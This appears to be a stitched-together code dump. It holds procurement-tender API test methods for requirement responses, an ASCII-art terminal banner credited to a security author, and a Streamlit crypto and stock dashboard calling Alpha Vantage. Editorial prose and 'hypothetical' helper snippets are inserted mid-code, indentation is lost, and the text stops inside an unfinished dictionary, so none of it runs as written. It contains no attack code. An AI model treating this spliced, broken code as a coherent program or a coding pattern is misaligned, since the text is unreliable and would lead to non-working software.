{'data': test_rr_data},
)
self.assertEqual(response.status, '201 Created')
rr_id = response.json["data"][0]["id"]
with open(TARGET_DIR + 'criteria/update-requirement-response.http', 'wb') as self.app.file_obj:
response = self.app.patch_json(
'/tenders/{}/bids/{}/requirement_responses/{}?acc_token={}'.format(
self.tender_id, bid_id, rr_id, bid_token),
{'data': {'title': 'Updated title'}},
)
self.assertEqual(response.status, '200 OK')
with open(TARGET_DIR + 'criteria/create-requirement-response-evidence.http', 'wb') as self.app.file_obj:
response = self.app.post_json(
'/tenders/{}/bids/{}/requirement_responses/{}/evidences?acc_token={}'.format(
self.tender_id, bid_id, rr_id, bid_token),
{'data': evidence_data},
)
self.assertEqual(response.status, '201 Created')
evidence_id = response.json["data"]["id"]
with open(TARGET_DIR + 'criteria/update-requirement-response-evidence.http', 'wb') as self.app.file_obj:
response = self.app.patch_json(
'/tenders/{}/bids/{}/requirement_responses/{}/evidences/{}?acc_token={}'.format(
self.tender_id, bid_id, rr_id, evidence_id, bid_token),
{'data': {'title': 'Updated evidence title'}},
)
self.assertEqual(response.status, '200 OK')
self.set_status("active.auction")
with open(TARGET_DIR + 'criteria/requirement-response-list.http', 'wb') as self.app.file_obj:
response = self.app.get(
'/tenders/{}/bids/{}/requirement_responses'.format(self.tender_id, bid_id))
self.assertEqual(response.status, '200 OK')
with open(TARGET_DIR + 'criteria/requirement-response.http', 'wb') as self.app.file_obj:
response = self.app.get(
'/tenders/{}/bids/{}/requirement_responses/{}'.format(self.tender_id, bid_id, rr_id))
self.assertEqual(response.status, '200 OK')
with open(TARGET_DIR + 'criteria/requirement-response-evidence-list.http', 'wb') as self.app.file_obj:
response = self.app.get(
'/tenders/{}/bids/{}/requirement_responses/{}/evidences'.format(self.tender_id, bid_id, rr_id))
self.assertEqual(response.status, '200 OK')
with open(TARGET_DIR + 'criteria/requirement-response-evidence.http', 'wb') as self.app.file_obj:
response = self.app.get(
'/tenders/{}/bids/{}/requirement_responses/{}/evidences/{}'.format(
self.tender_id, bid_id, rr_id, evidence_id))
self.assertEqual(response.status, '200 OK')
self.set_status("draft")
with open(TARGET_DIR + 'criteria/delete-requirement-response-evidence.http', 'wb') as self.app.file_obj:
response = self.app.delete(
'/tenders/{}/bids/{}/requirement_responses/{}/evidences/{}?acc_token={}'.format(
self.tender_id, bid_id, rr_id, evidence_id, bid_token))
self.assertEqual(response.status, '200 OK')
with open(TARGET_DIR + 'criteria/delete-requirement-response.http', 'wb') as self.app.file_obj:
response = self.app.delete(
'/tenders/{}/bids/{}/requirement_responses/{}?acc_token={}'.format(
self.tender_id, bid_id, rr_id, bid_token))
self.assertEqual(response.status, '200 OK')
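# The bid, award, and qualification tests all format the same nested
# '/tenders/.../requirement_responses' URL template by hand. A small builder
# (hypothetical, not part of the original suite) could factor that out:

```python
# Hypothetical URL builder (assumption, not part of the original suite):
# mirrors the requirement_responses URL templates used throughout the tests.
def rr_url(tender_id, parent, parent_id, rr_id=None, evidence_id=None, acc_token=None):
    url = '/tenders/{}/{}/{}/requirement_responses'.format(tender_id, parent, parent_id)
    if rr_id is not None:
        url += '/{}'.format(rr_id)
        if evidence_id is not None:
            url += '/evidences/{}'.format(evidence_id)
    if acc_token is not None:
        url += '?acc_token={}'.format(acc_token)
    return url
```

# e.g. rr_url(self.tender_id, 'bids', bid_id, rr_id, acc_token=bid_token)
# reproduces the patch/delete URLs built inline above.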
def test_award_requirement_response(self):
self.app.authorization = ('Basic', ('broker', ''))
response = self.app.post_json(
'/tenders?opt_pretty=1',
{'data': test_tender_data})
self.assertEqual(response.status, '201 Created')
tender = response.json['data']
owner_token = response.json['access']['token']
self.tender_id = tender['id']
self.set_status("active.tendering")
criteria_data = deepcopy(test_criteria[6:8])
response = self.app.post_json(
'/tenders/{}/criteria?acc_token={}'.format(self.tender_id, owner_token),
{'data': criteria_data},
)
self.assertEqual(response.status, '201 Created')
criteria = response.json["data"]
bid_data = deepcopy(bid)
bid_data["status"] = "draft"
response = self.app.post_json(
'/tenders/{}/bids'.format(self.tender_id),
{'data': bid_data})
bid_id = response.json['data']['id']
bid_token = response.json['access']['token']
response = self.app.patch_json(
'/tenders/{}/bids/{}?acc_token={}'.format(
self.tender_id, bid_id, bid_token),
{'data': {"status": "pending"}})
# create second bid
self.create_bid(self.tender_id, bid2)
# Pre-qualification
self.set_status(
'active.pre-qualification',
{"id": self.tender_id, 'status': 'active.tendering'})
self.check_chronograph()
response = self.app.get('/tenders/{}/qualifications'.format(self.tender_id))
self.assertEqual(response.status, "200 OK")
qualifications = response.json['data']
for qualification in qualifications:
response = self.app.patch_json(
'/tenders/{}/qualifications/{}?acc_token={}'.format(
self.tender_id, qualification['id'], owner_token),
{"data": {
"status": "active",
"qualified": True,
"eligible": True
}})
self.assertEqual(response.status, "200 OK")
# active.pre-qualification.stand-still
response = self.app.patch_json(
'/tenders/{}?acc_token={}'.format(self.tender_id, owner_token),
{"data": {"status": "active.pre-qualification.stand-still"}})
self.assertEqual(response.status, "200 OK")
self.assertEqual(response.json['data']['status'], "active.pre-qualification.stand-still")
# switch to active.auction
self.set_status('active.auction')
self.app.authorization = ('Basic', ('auction', ''))
response = self.app.get('/tenders/{}/auction'.format(self.tender_id))
auction_bids_data = response.json['data']['bids']
for b in auction_bids_data:
b.pop("status", None)
self.app.post_json(
'/tenders/{}/auction'.format(self.tender_id),
{'data': {'bids': auction_bids_data}})
self.app.authorization = ('Basic', ('broker', ''))
response = self.app.get('/tenders/{}/awards?acc_token={}'.format(self.tender_id, owner_token))
# get pending award
award_id = [i['id'] for i in response.json['data'] if i['status'] == 'pending'][0]
self.set_status("active.qualification")
response = self.app.post_json(
"/tenders/{}/awards/{}/documents?acc_token={}".format(
self.tender_id, award_id, owner_token),
{"data": {
"title": "name.doc",
"url": self.generate_docservice_url(),
"hash": "md5:" + "0" * 32,
"format": "application/msword",
}}
)
self.assertEqual(response.status, "201 Created")
doc_id = response.json["data"]["id"]
evidence_data = {
"title": "Requirement response",
"relatedDocument": {
"id": doc_id,
"title": "name.doc",
},
"type": "document",
}
requirement_1 = criteria[0]["requirementGroups"][0]["requirements"][0]
requirement_2 = criteria[1]["requirementGroups"][0]["requirements"][0]
rr_mock = {
"title": "Requirement response",
"description": "some description",
"requirement": {
"id": requirement_1["id"],
"title": requirement_1["title"],
},
"evidences": [
evidence_data,
],
"value": "True",
}
rr_1 = deepcopy(rr_mock)
rr_2 = deepcopy(rr_mock)
rr_2["title"] = "Requirement response 2"
rr_2["requirement"] = {
"id": requirement_2["id"],
"title": requirement_2["title"],
}
self.tick()
with open(TARGET_DIR + 'criteria/add-requirement-response-from-award.http', 'wb') as self.app.file_obj:
response = self.app.patch_json(
'/tenders/{}/awards/{}?acc_token={}'.format(
self.tender_id, award_id, owner_token),
{'data': {'requirementResponses': [rr_1, rr_2]}},
)
self.assertEqual(response.status, '200 OK')
rr_1["title"] = "Requirement response 1"
with open(TARGET_DIR + 'criteria/patch-requirement-response-from-award.http', 'wb') as self.app.file_obj:
response = self.app.patch_json(
'/tenders/{}/awards/{}?acc_token={}'.format(
self.tender_id, award_id, owner_token),
{'data': {'requirementResponses': [rr_1, rr_2]}},
)
self.assertEqual(response.status, '200 OK')
tender = self.db.get(self.tender_id)
for a in tender["awards"]:
if a["id"] == award_id:
del a["requirementResponses"]
self.db.save(tender)
test_rr_data = [deepcopy(rr_mock), ]
with open(TARGET_DIR + 'criteria/award-create-requirement-response.http', 'wb') as self.app.file_obj:
response = self.app.post_json(
'/tenders/{}/awards/{}/requirement_responses?acc_token={}'.format(
self.tender_id, award_id, owner_token),
{'data': test_rr_data},
)
self.assertEqual(response.status, '201 Created')
rr_id = response.json["data"][0]["id"]
with open(TARGET_DIR + 'criteria/award-update-requirement-response.http', 'wb') as self.app.file_obj:
response = self.app.patch_json(
'/tenders/{}/awards/{}/requirement_responses/{}?acc_token={}'.format(
self.tender_id, award_id, rr_id, owner_token),
{'data': {'title': 'Updated title'}},
)
self.assertEqual(response.status, '200 OK')
with open(TARGET_DIR + 'criteria/award-create-requirement-response-evidence.http', 'wb') as self.app.file_obj:
response = self.app.post_json(
'/tenders/{}/awards/{}/requirement_responses/{}/evidences?acc_token={}'.format(
self.tender_id, award_id, rr_id, owner_token),
{'data': evidence_data},
)
self.assertEqual(response.status, '201 Created')
evidence_id = response.json["data"]["id"]
with open(TARGET_DIR + 'criteria/award-update-requirement-response-evidence.http', 'wb') as self.app.file_obj:
response = self.app.patch_json(
'/tenders/{}/awards/{}/requirement_responses/{}/evidences/{}?acc_token={}'.format(
self.tender_id, award_id, rr_id, evidence_id, owner_token),
{'data': {'title': 'Updated evidence title'}},
)
self.assertEqual(response.status, '200 OK')
with open(TARGET_DIR + 'criteria/award-requirement-response-list.http', 'wb') as self.app.file_obj:
response = self.app.get(
'/tenders/{}/awards/{}/requirement_responses'.format(self.tender_id, award_id))
self.assertEqual(response.status, '200 OK')
with open(TARGET_DIR + 'criteria/award-requirement-response.http', 'wb') as self.app.file_obj:
response = self.app.get(
'/tenders/{}/awards/{}/requirement_responses/{}'.format(self.tender_id, award_id, rr_id))
self.assertEqual(response.status, '200 OK')
with open(TARGET_DIR + 'criteria/award-requirement-response-evidence-list.http', 'wb') as self.app.file_obj:
response = self.app.get(
'/tenders/{}/awards/{}/requirement_responses/{}/evidences'.format(self.tender_id, award_id, rr_id))
self.assertEqual(response.status, '200 OK')
with open(TARGET_DIR + 'criteria/award-requirement-response-evidence.http', 'wb') as self.app.file_obj:
response = self.app.get(
'/tenders/{}/awards/{}/requirement_responses/{}/evidences/{}'.format(
self.tender_id, award_id, rr_id, evidence_id))
self.assertEqual(response.status, '200 OK')
with open(TARGET_DIR + 'criteria/award-delete-requirement-response-evidence.http', 'wb') as self.app.file_obj:
response = self.app.delete(
'/tenders/{}/awards/{}/requirement_responses/{}/evidences/{}?acc_token={}'.format(
self.tender_id, award_id, rr_id, evidence_id, owner_token))
self.assertEqual(response.status, '200 OK')
with open(TARGET_DIR + 'criteria/award-delete-requirement-response.http', 'wb') as self.app.file_obj:
response = self.app.delete(
'/tenders/{}/awards/{}/requirement_responses/{}?acc_token={}'.format(
self.tender_id, award_id, rr_id, owner_token))
self.assertEqual(response.status, '200 OK')
def test_qualification_requirement_response(self):
self.app.authorization = ('Basic', ('broker', ''))
response = self.app.post_json(
'/tenders?opt_pretty=1',
{'data': test_tender_data})
self.assertEqual(response.status, '201 Created')
tender = response.json['data']
owner_token = response.json['access']['token']
self.tender_id = tender['id']
self.set_status("active.tendering")
criteria_data = deepcopy(test_criteria[6:8])
response = self.app.post_json(
'/tenders/{}/criteria?acc_token={}'.format(self.tender_id, owner_token),
{'data': criteria_data},
)
self.assertEqual(response.status, '201 Created')
criteria = response.json["data"]
bid_data = deepcopy(bid)
bid_data["status"] = "draft"
response = self.app.post_json(
'/tenders/{}/bids'.format(self.tender_id),
{'data': bid_data})
bid_id = response.json['data']['id']
bid_token = response.json['access']['token']
response = self.app.patch_json(
'/tenders/{}/bids/{}?acc_token={}'.format(
self.tender_id, bid_id, bid_token),
{'data': {"status": "pending"}})
# create second bid
self.app.authorization = ('Basic', ('broker', ''))
self.create_bid(self.tender_id, bid2)
# Pre-qualification
self.set_status(
'active.pre-qualification',
{"id": self.tender_id, 'status': 'active.tendering'})
self.check_chronograph()
response = self.app.get('/tenders/{}/qualifications'.format(self.tender_id))
self.assertEqual(response.status, "200 OK")
qualifications = response.json['data']
qualification_id = qualifications[0]["id"]
response = self.app.post_json(
"/tenders/{}/qualifications/{}/documents?acc_token={}".format(
self.tender_id, qualification_id, owner_token),
{"data": {
"title": "name.doc",
"url": self.generate_docservice_url(),
"hash": "md5:" + "0" * 32,
"format": "application/msword",
}}
)
self.assertEqual(response.status, "201 Created")
doc_id = response.json["data"]["id"]
evidence_data = {
"title": "Requirement response",
"relatedDocument": {
"id": doc_id,
"title": "name.doc",
},
"type": "document",
}
requirement_1 = criteria[0]["requirementGroups"][0]["requirements"][0]
requirement_2 = criteria[1]["requirementGroups"][0]["requirements"][0]
rr_mock = {
"title": "Requirement response",
"description": "some description",
"requirement": {
"id": requirement_1["id"],
"title": requirement_1["title"],
},
"evidences": [
evidence_data,
],
"value": "True",
}
rr_1 = deepcopy(rr_mock)
rr_2 = deepcopy(rr_mock)
rr_2["title"] = "Requirement response 2"
rr_2["requirement"] = {
"id": requirement_2["id"],
"title": requirement_2["title"],
}
self.tick()
with open(TARGET_DIR + 'criteria/add-requirement-response-from-qualification.http', 'wb') as self.app.file_obj:
response = self.app.patch_json(
'/tenders/{}/qualifications/{}?acc_token={}'.format(
self.tender_id, qualification_id, owner_token),
{'data': {'requirementResponses': [rr_1, rr_2]}},
)
self.assertEqual(response.status, '200 OK')
rr_1["title"] = "Requirement response 1"
with open(TARGET_DIR + 'criteria/patch-requirement-response-from-qualification.http', 'wb') as self.app.file_obj:
response = self.app.patch_json(
'/tenders/{}/qualifications/{}?acc_token={}'.format(
self.tender_id, qualification_id, owner_token),
{'data': {'requirementResponses': [rr_1, rr_2]}},
)
self.assertEqual(response.status, '200 OK')
with open(TARGET_DIR + 'criteria/delete-requirement-response-from-qualification.http', 'wb') as self.app.file_obj:
response = self.app.patch_json(
'/tenders/{}/qualifications/{}?acc_token={}'.format(
self.tender_id, qualification_id, owner_token),
{'data': {'requirementResponses': []}},
)
self.assertEqual(response.status, '200 OK')
test_rr_data = [deepcopy(rr_mock), ]
with open(TARGET_DIR + 'criteria/qualification-create-requirement-response.http', 'wb') as self.app.file_obj:
response = self.app.post_json(
'/tenders/{}/qualifications/{}/requirement_responses?acc_token={}'.format(
self.tender_id, qualification_id, owner_token),
{'data': test_rr_data},
)
self.assertEqual(response.status, '201 Created')
rr_id = response.json["data"][0]["id"]
with open(TARGET_DIR + 'criteria/qualification-update-requirement-response.http', 'wb') as self.app.file_obj:
response = self.app.patch_json(
'/tenders/{}/qualifications/{}/requirement_responses/{}?acc_token={}'.format(
self.tender_id, qualification_id, rr_id, owner_token),
{'data': {'title': 'Updated title'}},
)
self.assertEqual(response.status, '200 OK')
with open(TARGET_DIR + 'criteria/qualification-create-requirement-response-evidence.http', 'wb') as self.app.file_obj:
response = self.app.post_json(
'/tenders/{}/qualifications/{}/requirement_responses/{}/evidences?acc_token={}'.format(
self.tender_id, qualification_id, rr_id, owner_token),
{'data': evidence_data},
)
self.assertEqual(response.status, '201 Created')
evidence_id = response.json["data"]["id"]
with open(TARGET_DIR + 'criteria/qualification-update-requirement-response-evidence.http', 'wb') as self.app.file_obj:
response = self.app.patch_json(
'/tenders/{}/qualifications/{}/requirement_responses/{}/evidences/{}?acc_token={}'.format(
self.tender_id, qualification_id, rr_id, evidence_id, owner_token),
{'data': {'title': 'Updated evidence title'}},
)
self.assertEqual(response.status, '200 OK')
with open(TARGET_DIR + 'criteria/qualification-requirement-response-list.http', 'wb') as self.app.file_obj:
response = self.app.get(
'/tenders/{}/qualifications/{}/requirement_responses'.format(self.tender_id, qualification_id))
self.assertEqual(response.status, '200 OK')
with open(TARGET_DIR + 'criteria/qualification-requirement-response.http', 'wb') as self.app.file_obj:
response = self.app.get(
'/tenders/{}/qualifications/{}/requirement_responses/{}'.format(
self.tender_id, qualification_id, rr_id))
self.assertEqual(response.status, '200 OK')
with open(TARGET_DIR + 'criteria/qualification-requirement-response-evidence-list.http', 'wb') as self.app.file_obj:
response = self.app.get(
'/tenders/{}/qualifications/{}/requirement_responses/{}/evidences'.format(
self.tender_id, qualification_id, rr_id))
self.assertEqual(response.status, '200 OK')
with open(TARGET_DIR + 'criteria/qualification-requirement-response-evidence.http', 'wb') as self.app.file_obj:
response = self.app.get(
'/tenders/{}/qualifications/{}/requirement_responses/{}/evidences/{}'.format(
self.tender_id, qualification_id, rr_id, evidence_id))
self.assertEqual(response.status, '200 OK')
with open(TARGET_DIR + 'criteria/qualification-delete-requirement-response-evidence.http', 'wb') as self.app.file_obj:
response = self.app.delete(
'/tenders/{}/qualifications/{}/requirement_responses/{}/evidences/{}?acc_token={}'.format(
self.tender_id, qualification_id, rr_id, evidence_id, owner_token))
self.assertEqual(response.status, '200 OK')
with open(TARGET_DIR + 'criteria/qualification-delete-requirement-response.http', 'wb') as self.app.file_obj:
response = self.app.delete(
'/tenders/{}/qualifications/{}/requirement_responses/{}?acc_token={}'.format(
self.tender_id, qualification_id, rr_id, owner_token))
self.assertEqual(response.status, '200 OK')
from colorama import Fore
from config.Config import Config
W = Fore.LIGHTRED_EX
B = Fore.LIGHTBLUE_EX
LD = Fore.LIGHTBLACK_EX
D = Fore.BLACK
C = Fore.WHITE
white_screen_logo = rf"""
.......................................................................................
.%%%%
##%((.
,*(&(%
#*%%/#
.//&((,
.#*#&/#.
.//&#/%
#/(&(/%
.(//%&/(#
.*(/(%%(((
.,#((%&%((#.
..%##%%&%((#.
,%%%%%%&%##%
.(%%%#%%%&%%%&,
.(%%%/*/(##%%&%%( .
/..*%%%%#/,..,,,/%&&%%,..
*(#%##((///(#%%%%%%%%%#((/((#%%%&#,...
.,,**/((((#(#####%%%%%%%%%%%%%%####%%&%%%&%#/...,
%. ,,**/(###%%%%%%%%&%%%%%%%%%#(((##%%%%%%##(/,. ,,*
&&%%%%%%%%%%%%%%%%%%%%%%%%%#(/(((#%%%%##%(///,,,. ..,,*
(&&&%#////(%//#%%%%%%%###((((#%%%%####//(**/,... .* .,,
%&&&&&&&%#//(((%%%%(*,/(#%%%%%%%%%##(/(/,,..,. , . .
,&&&&&&&&&&&&&&&&&&&&&&&&%%%(/#////(((#%%&&&&&&&&
%&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&%/.
&&&&&&&&&&&&&&&&&&&&&&&/
&&&&&&&&&&&&&&&&&&&
&&&&&&&&&&&&&&&#
.......,,,,,/&&&&&&&&&&&&&*****,,,,,,......
......,,,,,,*************(&&&&&&&&&&**////////////////*****,,,,.....
......,,,,,,*******//////////*/*&&&&&&&//////////////////////////****,,,,,...
.....,,,,,,*****//////(((((((######%%%%%%%%#####((((((((((((((((////****,,,,......
.........,#(*,*****////((((((((((((((((#############%%#######((((///*****,,,,..........
........{W}%%{C}........................................{W}#%%{C}..................................
........{W}%%.,%%%%%%% .#%%%%% ,%%%%%. ,#%%%%. %%%%%%%%* ,%%%%%. %,.%%%%,{C}...........
........{W}%% #%% %% #%%. .#%% %% %% %% #%% #%% %% %%{C}.................
........{W}%% #%% %% #%% .#%%%%&&. %%%%%%. #%% %%, %% %%{C}.................
........{W}%% #%% %% #%%. ,%%. %% #%. # #%% ,%% %%{C}.................
........{W}%% #%% %% #%%%%% #%%%%* %% \%%%* *#%%% %%%{C}................
.......................................................................................
▒ {Fore.LIGHTCYAN_EX}by d3adc0de (@klezVirus){C}
---------------------------------------------------------------------------------------
"""
black_screen_logo = rf"""
{C}@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@&{D},{LD},,{D},{C}@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@{D}*{C}*{D},{LD}//{C}&@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@{LD}%{LD}#{C}/{D}.{LD}/{D},{C}@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@{LD}*{LD}#{C},{D},{LD}({D}*{C}@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@&{LD}({C}({D}.{LD}/{D}/{C}%@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
import datetime
import streamlit as st
import pandas as pd
import plotly.express as px
import numpy as np
from plotly.subplots import make_subplots
import plotly.graph_objects as go
import requests as rs
import json
import random
import webbrowser
import yfinance as yf
from sys_var import api_list,indicator_symbol_list,graph_type_list
class MyError(Exception):
    """Exception carrying a user-facing message shown via st.info()."""

    def __init__(self, value):
        self.value = value

    def __str__(self):
        return repr(self.value)
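Throughout this script the Alpha Vantage query URLs are assembled by ad-hoc string concatenation mixed with `random.choice(api_list)`. A small helper could centralise that pattern; `build_av_url` below is a hypothetical sketch introduced by this edit, not part of the original code:

```python
from urllib.parse import urlencode

AV_BASE = "https://www.alphavantage.co/query"

def build_av_url(function, apikey, **params):
    # Assemble the query string in one place; urlencode also escapes any
    # characters that raw concatenation would pass through unescaped.
    query = {"function": function, **params, "apikey": apikey}
    return AV_BASE + "?" + urlencode(query)
```

A call such as `rs.get(build_av_url("CRYPTO_INTRADAY", random.choice(api_list), symbol=input_value, market=currency_select, interval="5min"))` could then replace each hand-built URL.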
st.set_page_config(layout='wide')
st.sidebar.title('Financial Analysis Dashboard')
radio_select = st.sidebar.radio('Select from the options below', ['Indian Stocks', 'Crypto', 'US Stocks', 'Forex',
"Global stocks and more(Alpha Vantage)",
"Global stocks and more(Yahoo Finance)"])
if radio_select == 'Crypto' :
st.title("CRYPTOCURRENCIES")
col1, col2 = st.columns(2)
with col1 :
digital_data = pd.read_csv("digital_currency_list.csv")
dictio = digital_data.set_index('currency name').T.to_dict('list')
digital_list = digital_data['currency name'].dropna().unique().tolist()
crypto_select1 = st.selectbox("Select a Cryptocurrency", digital_list)
input_value = dictio[crypto_select1][0]
with col2 :
currency_data = pd.read_csv("physical_currency_list.csv")
dictio2 = currency_data.set_index('currency name').T.to_dict('list')
currency_list = currency_data['currency name'].dropna().unique().tolist()
currency_select = st.selectbox("Select Currency Pair", currency_list)
currency_select = dictio2[currency_select][0]
with st.expander('Show Options'):
col3, col4 = st.columns(2)
col5, col6 = st.columns(2)
with col3 :
interval_list = ["1 Minute", "5 Minutes", "15 Minutes", "30 Minutes", "60 Minutes", "1 Day", "1 Week",
"1 Month"]
interval_list1 = ["1 Minute", "5 Minutes", "15 Minutes", "30 Minutes", "60 Minutes"]
interval_list2 = ["1 Day", "1 Week", "1 Month"]
interval_list1_dict = {"1 Minute" : "1min", "5 Minutes" : "5min", "15 Minutes" : "15min",
"30 Minutes" : "30min",
"60 Minutes" : "60min"}
interval_list2_dict = {"1 Day" : "DAILY", "1 Week" : "WEEKLY", "1 Month" : "MONTHLY"}
interval_list21_dict = {"1 Day" : "Daily", "1 Week" : "Weekly", "1 Month" : "Monthly"}
indicator_dict = {"1 Minute" : "1min", "5 Minutes" : "5min", "15 Minutes" : "15min", "30 Minutes" : "30min",
"60 Minutes" : "60min", "1 Day" : "daily", "1 Week" : "weekly", "1 Month" : "monthly"}
interval_select = st.selectbox("Select Interval", interval_list)
with col4 :
graph_type = st.selectbox('Select Graph type', graph_type_list)
flag = 0
if interval_select in interval_list1 :
flag = 1
try :
y_arr = ['Rate']
data = None
if flag == 1 :
data = rs.get("https://www.alphavantage.co/query?function=CRYPTO_INTRADAY&symbol=" + str(
input_value) + "&market=" + str(currency_select) + "&interval=" + interval_list1_dict[
interval_select] + "&apikey=" + random.choice(api_list))
data = data.json()
data = json.dumps(data["Time Series Crypto (" + str(interval_list1_dict[interval_select]) + ")"])
data = pd.read_json(data)
data = data.T.reset_index()
data.rename(columns={'1. open' : 'Open'}, inplace=True)
data.rename(columns={'2. high' : 'High'}, inplace=True)
data.rename(columns={'3. low' : 'Low'}, inplace=True)
data.rename(columns={'4. close' : 'Rate'}, inplace=True)
st.markdown(
"<h1 style='text-align: center; color: red;'>Chart of " + crypto_select1 + " <sub style='font-size: 25px;'>" + input_value + "/" + currency_select + "</sub></h1>",
unsafe_allow_html=True)
if graph_type == 'Line' :
fig = make_subplots(specs=[[{"secondary_y" : True}]])
fig.add_trace(go.Scatter(x=data['index'], y=data['Rate'], name='Rate'),
secondary_y=True)
fig.add_trace(go.Bar(x=data['index'], y=data['5. volume'], name='Volume', opacity=0.5),
secondary_y=False)
fig.update_layout(autosize=False, width=1600, height=800, legend_title="Indicators", font=dict(
family="Courier New, monospace",
size=18,
color="RebeccaPurple"
))
fig.layout.yaxis2.showgrid = False
st.plotly_chart(fig)
if graph_type == 'Candlesticks' or graph_type == 'OHLC' :
data.rename(columns={'Rate' : 'Close'}, inplace=True)
fig = make_subplots(specs=[[{"secondary_y" : True}]])
# price trace: candlestick or OHLC bars, depending on the selected graph type
if graph_type == 'Candlesticks':
fig.add_trace(go.Candlestick(x=data['index'],
open=data['Open'], high=data['High'],
low=data['Low'], close=data['Close'], name='Rate'),
secondary_y=True)
if graph_type == 'OHLC':
fig.add_trace(go.Ohlc(x=data['index'],
open=data['Open'], high=data['High'],
low=data['Low'], close=data['Close'], name='Rate'),
secondary_y=True)
# include a go.Bar trace for volumes
fig.add_trace(go.Bar(x=data['index'], y=data['5. volume'], name='Volume', opacity=0.5),
secondary_y=False)
fig.update_layout(autosize=False, width=1600, height=800, legend_title="Indicators", font=dict(
family="Courier New, monospace",
size=18,
color="RebeccaPurple"
))
fig.layout.yaxis2.showgrid = False
st.plotly_chart(fig)
if graph_type == 'Filled Area' :
fig = px.area(data, x='index', y='Rate', template="ggplot2", labels={"index" : "Date"})
fig.update_layout(autosize=False, width=1600, height=800, legend_title="Indicators", font=dict(
family="Courier New, monospace",
size=18,
color="RebeccaPurple"
))
st.plotly_chart(fig)
if flag == 0 :
data = rs.get("https://www.alphavantage.co/query?function=DIGITAL_CURRENCY_" + interval_list2_dict[
interval_select] + "&symbol=" + str(
input_value) + "&market=" + str(currency_select) + "&apikey=" + random.choice(api_list))
data = data.json()
data = json.dumps(data["Time Series (Digital Currency " + str(interval_list21_dict[interval_select]) + ")"])
data = pd.read_json(data)
data = data.T.reset_index()
data.rename(columns={'4a. close (' + str(currency_select) + ')' : 'Rate'}, inplace=True)
data.rename(columns={'1a. open (' + str(currency_select) + ')' : 'Open'}, inplace=True)
data.rename(columns={'2a. high (' + str(currency_select) + ')' : 'High'}, inplace=True)
data.rename(columns={'3a. low (' + str(currency_select) + ')' : 'Low'}, inplace=True)
if graph_type != 'Filled Area' :
with col5 :
indicate_select = st.multiselect('Add Indicators', indicator_symbol_list)
interval_sel = indicate_select
with col6 :
time_select = st.number_input('Select indicator time period', max_value=30, min_value=5, step=1)
for i in range(len(interval_sel)) :
data2 = rs.get("https://www.alphavantage.co/query?function=" + interval_sel[i] + "&symbol=" + str(
input_value) + str(currency_select) + "&interval=" + indicator_dict[
interval_select] + "&time_period=" + str(
time_select) + "&series_type=open&apikey=" + random.choice(api_list))
data2 = data2.json()
data2 = json.dumps(data2["Technical Analysis: " + interval_sel[i]])
data2 = pd.read_json(data2)
data2 = data2.T.reset_index()
data = pd.merge(data, data2, on="index", how="left")
y_arr = y_arr + interval_sel
st.markdown(
"<h1 style='text-align: center; color: red;'>Chart of " + crypto_select1 + " <sub style='font-size: 25px;'>" + input_value + "/" + currency_select + "</sub></h1>",
unsafe_allow_html=True)
if graph_type == 'Line' :
fig = make_subplots(specs=[[{"secondary_y" : True}]])
fig.add_trace(go.Scatter(x=data['index'], y=data['Rate'], name='Rate'),
secondary_y=True)
for i in range(len(interval_sel)) :
fig.add_trace(go.Scatter(x=data['index'], y=data[interval_sel[i]], name=interval_sel[i]),
secondary_y=True)
fig.add_trace(go.Bar(x=data['index'], y=data['5. volume'], name='Volume', opacity=0.5),
secondary_y=False)
fig.update_layout(autosize=False, width=1600, height=800, legend_title="Indicators", font=dict(
family="Courier New, monospace",
size=18,
color="RebeccaPurple"
))
fig.layout.yaxis2.showgrid = False
st.plotly_chart(fig)
if graph_type == 'Candlesticks' or graph_type == 'OHLC' :
data.rename(columns={'Rate' : 'Close'}, inplace=True)
fig = make_subplots(specs=[[{"secondary_y" : True}]])
# price trace: candlestick or OHLC bars, depending on the selected graph type
if graph_type == 'Candlesticks' :
fig.add_trace(go.Candlestick(x=data['index'],
open=data['Open'], high=data['High'],
low=data['Low'], close=data['Close'], name='Rate'),
secondary_y=True)
if graph_type == 'OHLC' :
fig.add_trace(go.Ohlc(x=data['index'],
open=data['Open'], high=data['High'],
low=data['Low'], close=data['Close'], name='Rate'),
secondary_y=True)
# include a go.Bar trace for volumes
fig.add_trace(go.Bar(x=data['index'], y=data['5. volume'], name='Volume', opacity=0.5),
secondary_y=False)
fig.update_layout(autosize=False, width=1600, height=800, legend_title="Indicators", font=dict(
family="Courier New, monospace",
size=18,
color="RebeccaPurple"
))
fig.layout.yaxis2.showgrid = False
st.plotly_chart(fig)
if graph_type == 'Filled Area' :
fig = px.area(data, x='index', y='Rate', template="ggplot2", labels={"index" : "Date"})
fig.update_layout(autosize=False, width=1600, height=500, legend_title="Indicators", font=dict(
family="Courier New, monospace",
size=18,
color="RebeccaPurple"
))
st.plotly_chart(fig)
except Exception as e :
st.info(
        "The selected cryptocurrency data is currently unavailable. Please check your connection or choose another cryptocurrency (such as Bitcoin).")
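Each branch of this script repeats the same response massaging: `json.dumps` → `pd.read_json` → transpose → `reset_index` → four `rename` calls. As a hedged sketch (the helper name and the `Rate` label are this edit's assumptions, not the original author's API), those steps collapse to:

```python
import pandas as pd

# Column labels as returned by the Alpha Vantage time-series endpoints.
OHLC_RENAMES = {
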